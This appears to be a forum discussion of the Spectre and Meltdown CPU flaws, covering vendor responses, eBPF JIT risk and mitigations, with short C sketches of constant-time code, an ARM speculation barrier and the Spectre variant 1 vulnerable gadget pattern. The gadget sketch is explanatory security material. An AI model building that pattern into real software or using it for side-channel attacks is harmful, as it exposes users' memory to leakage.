It is perhaps beneficial to be using an easily portable OS that can be run on older computers, and a variety of architectures.

Sometimes older computers are resilient against some of today's attacks, to the extent those attacks make assumptions about the hardware and software in use. (The same is true for software.)

When optimization reaches a point where it exposes one to attacks like the ones being discussed here, then maybe the question arises whether the optimization is actually a "design defect".

What is the solution?

IMO, having choice is at least part of any solution.

If every user is effectively "forced" to use the same hardware and the same software, perhaps from a single source or small number of sources, then that is beneficial for those sources but, IMO, counter to a real solution for users. Lack of viable alternatives is not beneficial to users.



I wonder what this sentence in the Google product status page (https://support.google.com/faqs/answer/7622138) means, particularly what the inter-guest attack refers to:

"Compute Engine customers must update their virtual machine operating systems and applications so that their virtual machines are protected from intra-guest attacks and inter-guest attacks that exploit application-level vulnerabilities"


What I understand is that the hypervisor of GCE has already been patched, so a customer running on the same machine as you can't exploit you. However, if you are running KVM or something similar yourself on a cloud instance (a VM in a VM), then you should patch that.


Does anyone know what kind of isolation still works after all the patches? Let's say we want to host users' processes or containers, and some of them could be pwned. I see Google claiming that their VMs are isolated from the kernel and from each other.


Intel has released a statement for the codename Meltdown bug:

https://newsroom.intel.com/news/intel-responds-to-security-r...


Again conflating the issue to include AMD. This feels so disingenuous.


> We have some ideas on possible mitigations and provided some of those ideas to the processor vendors; however, we believe that the processor vendors are in a much better position than we are to design and evaluate mitigations, and we expect them to be the source of authoritative guidance.

Intel: "Recent reports that these exploits are caused by a “bug” or a “flaw” [..] are incorrect."

So much for "authoritative guidance", fuck these guys.


Arm also claims it is working as intended:

> Arm recognises that the speculation functionality of many modern high-performance processors, despite working as intended, can be used in conjunction with the timing of cache operations to leak some information as described in this blog.

I personally don't agree, but I guess they're trying to avoid needing to issue a recall for over ten years' worth of CPUs?


Then surely you must also argue that all data-dependent, side-channel attacks, such as key recovery attacks against some cryptographic algorithm implementations, are the fault of the hardware.

Unlike Intel, ARM and AMD are implicated only where the attacker can inject code or data (specifically data that is manipulated by pre-existing vulnerable code) into the target address space. The particular kernel exploits require injection of a JIT-compiled eBPF program, as they said they were unable to locate any suitable gadgets in existing compiled kernel code. I wouldn't rule out gadgets being found in the future, but much like cryptographic software timing attacks, the proper fix is to refactor sensitive software logic to be data independent. There's no way to implement an out-of-order, superscalar architecture and protect against this stuff simply because of the nature of memory hierarchies. All you can do is 1) ensure that privilege boundaries are obeyed (like AMD and ARM do, but Intel notably doesn't), and 2) provide guaranteed, constant-time instructions that programmers and compilers can reliably and conveniently leverage. Unfortunately, all the hardware vendors have sucked at providing #2 (much timing-resilient cryptographic software relies on implicit, historical timing behavior, not architecturally guaranteed behavior), but it nonetheless still requires cooperation by software programmers, making it a shared burden.
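
As a small illustration of the kind of data-independent refactoring I mean (my own example, not from any paper): a comparison routine whose timing depends only on the length, not on where the inputs differ, unlike memcmp():

    #include <stddef.h>
    #include <stdint.h>

    /* Constant-time equality check: runtime depends only on n, not on
       the contents of a or b, so timing leaks nothing about the data. */
    int ct_equal(const uint8_t *a, const uint8_t *b, size_t n) {
        uint8_t diff = 0;
        for (size_t i = 0; i < n; i++)
            diff |= a[i] ^ b[i];   /* accumulate differences, no branching */
        return diff == 0;          /* 1 iff all bytes matched */
    }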

Also, FWIW, basically everybody outside the Linux echo chamber has known that eBPF JIT and especially unprivileged eBPF JIT was a disaster waiting to happen. This is only the latest exploit it's been at the center of, and the 2nd in as many months. The amount of attention and effort that has gone into securing eBPF is remarkable, but at the end of the day even if you could muster all the best programmers for as much time as you wanted it's still an exceptionally risky endeavor. Everything we know about the evolution of exploits screams that unprivileged eBPF JIT is an unrelenting nightmare. But it's convenient, flexible, and performant, and at the end of the day that's all people really care about, including most Linux kernel engineers. The nature of the Linux ecosystem is that even if Linus vetoed unprivileged eBPF JIT (optional or not), vendors would have likely shipped it anyhow. It's an indictment of the software industry. Blaming hardware vendors (except for the Intel issue) is just an excuse that perpetuates the abysmal state of software security.


>The particular kernel exploits require injection of a JIT-compiled eBPF program, as they said they were unable to locate any suitable gadgets in existing compiled kernel code

Did they say that?

I don't see anything saying they were unable to, just that they didn't bother to because it would take effort.

>But piecing gadgets together and figuring out which ones work in a speculation context seems annoying. So instead, we decided to use the eBPF interpreter, which is built into the host kernel - while there is no legitimate way to invoke it from inside a VM, the presence of the code in the host kernel's text section is sufficient to make it usable for the attack, just like with ordinary ROP gadgets.


The quote you have is for exploiting Variant 2, the post above yours was talking about Variant 1. For Variant 1, the authors say:

> To be able to actually use this behavior for an attack, an attacker needs to be able to cause the execution of such a vulnerable code pattern in the targeted context with an out-of-bounds index. For this, the vulnerable code pattern must either be present in existing code, or there must be an interpreter or JIT engine that can be used to generate the vulnerable code pattern. So far, we have not actually identified any existing, exploitable instances of the vulnerable code pattern; the PoC for leaking kernel memory using variant 1 uses the eBPF interpreter or the eBPF JIT engine, which are built into the kernel and accessible to normal users.

For Variant 1, the "vulnerable code pattern" they're looking for has to be of a very specific type; it's not a run-of-the-mill gadget. It has to load from an array with a user-controlled offset, then mask out a small number of bits from the result and use that as an offset to load from another array, where we can then time our accesses to that second array.
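
Roughly something shaped like this (a sketch modeled on the code in the Project Zero post; the identifiers are illustrative, not real kernel code):

    struct array { unsigned long length; unsigned char data[]; };

    unsigned char victim(struct array *arr1, struct array *arr2,
                         unsigned long untrusted_offset) {
        unsigned char value2 = 0;
        if (untrusted_offset < arr1->length) {      /* bounds check the CPU
                                                       may bypass speculatively */
            unsigned char value = arr1->data[untrusted_offset];
            unsigned long index2 = ((value & 1) * 0x100) + 0x200;
            if (index2 < arr2->length)              /* second, value-dependent load
                                                       leaves a cache footprint */
                value2 = arr2->data[index2];
        }
        return value2;
    }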

However, they also go on to say:

> A minor variant of this could be to instead use an out-of-bounds read to a function pointer to gain control of execution in the mis-speculated path. We did not investigate this variant further.

Which seems much less reassuring.


Gotcha! Thanks for setting me straight here.


They go into detail in the white paper https://developer.arm.com/-/media/Files/pdf/Cache_Speculatio...

They are adding a new instruction to control speculation...
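
If I'm reading the whitepaper right, the suggested pattern is to clamp the index with a conditional select and then issue the new CSDB barrier so the clamped value can't be consumed speculatively. A rough sketch in C with inline assembly (my own, not from the whitepaper; assumes an AArch64 toolchain that accepts the csdb mnemonic):

    #include <stddef.h>
    #include <stdint.h>

    uint8_t bounded_read(const uint8_t *arr, size_t len, size_t idx) {
        if (idx < len) {
            size_t safe_idx;
            __asm__ volatile(
                "cmp  %[i], %[l]\n\t"
                "csel %[s], %[i], xzr, lo\n\t"  /* safe_idx = idx if in
                                                   bounds, else 0 */
                "csdb"                          /* barrier: no speculative
                                                   use of the selection */
                : [s] "=r" (safe_idx)
                : [i] "r" (idx), [l] "r" (len)
                : "cc");
            return arr[safe_idx];
        }
        return 0;
    }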


Someone should honestly do a press release like "Intel bug not actually Intel-only", or give this thing a neutral name to search for.


Variant 2 and Variant 3 are Intel-only. They are the most concerning, as they break VM isolation.


Great, the embargo was in place and Google went ahead disclosing, saying "here we are, disclosing this" (because they've patched).


Three or four people had bits of demo code up on Twitter earlier today.

I implemented it myself simply based on the clues in the press release from AMD explaining why they weren't vulnerable. I don't even have a computer security background.


So the vulnerability likely isn't something nobody thought of; it's just that nobody seriously expected the CPU vendors to make the mistake of speculating across multiple loads and actually leaving observable modifications in the caches.

Note that even speculating across multiple loads could lead to observable side effects, e.g. by measuring memory bandwidth to differentiate between loads from accessible addresses and silent page faults. [1]

An interesting question is whether the CPU would also speculate on loads from mapped PCI device regions, as that could also be detectable in many different ways.

[1] https://eprint.iacr.org/2016/613.pdf

> Both hardware thread systems (SMT and TMT) expose contention within the execution core. In SMT, the threads effectively compete in real time for access to functional units, the L1 cache, and speculation resources (such as the BTB). This is similar to the real-time sharing that occurs between separate cores, but includes all levels of the architecture. [...] SMT has been exploited in known attacks (Sections 4.2.1 and 4.3.1)


The papers take a while to get to the point. I nearly fell asleep re-reading the same statements before they finally arrived at it: speculative execution of buffer overflows.

Could have been said more concisely. Sadly, this seems to be the norm with academic texts.


It gives all the required context, which an "average" engineer needs to understand it. Without that, most people, except microchip engineers, would have to read up on the related topics first anyway. I personally was surprised at how clearly everything was explained.



